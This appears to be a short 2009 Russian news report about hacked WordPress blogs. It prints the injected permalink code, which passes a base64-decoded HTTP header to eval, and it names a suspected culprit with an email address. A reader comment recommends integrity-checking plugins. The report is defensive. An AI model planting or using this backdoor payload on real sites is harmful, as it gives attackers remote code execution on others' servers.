WP - очередная уязвимость
В блогах на Word Press может появиться посторонний код в ссылках на подкат.
Как сообщил блоггер Zeddy, его блог на платформе WP и блоги его коллег были несанкционированно дополнены лишней строкой кода - вот такой:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или такой:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Взломанные блоги следует очистить от лишних ссылок, а также, возможно, стоит забанить MikeWink (E-mail: bugbeemershonyhe@gmail.com)
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или такой:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Взломанные блоги следует очистить от лишних ссылок, а также, возможно, стоит забанить MikeWink (E-mail: bugbeemershonyhe@gmail.com)
Тэги: блоги, преступление, сайт, хакеры
Новости по теме:
SeoPult проводит очередной круглый стол
На блоггера Дмитрия Давыдова подали в суд
2 фактора, влияющих на сканирование сайта роботом Google
Если вы заметили ошибку в тексте новости, пожалуйста, выделите её и нажмите Ctrl+Enter
0 баллов
Комментарии:
seofin / 07 September 2009 11:52
2
Сайт:
Еще в дополнение, чтобы быть в курсе событий, что творится с ваши ВП, необходимо пользоваться двумя плагинами:
belavir (php MD5) - проверка целостности
TAC (Theme Authenticity Checker) - проверка темы
И в таком случае даже если вам что-то внедрили Вы об этом узнаете...
belavir (php MD5) - проверка целостности
TAC (Theme Authenticity Checker) - проверка темы
И в таком случае даже если вам что-то внедрили Вы об этом узнаете...



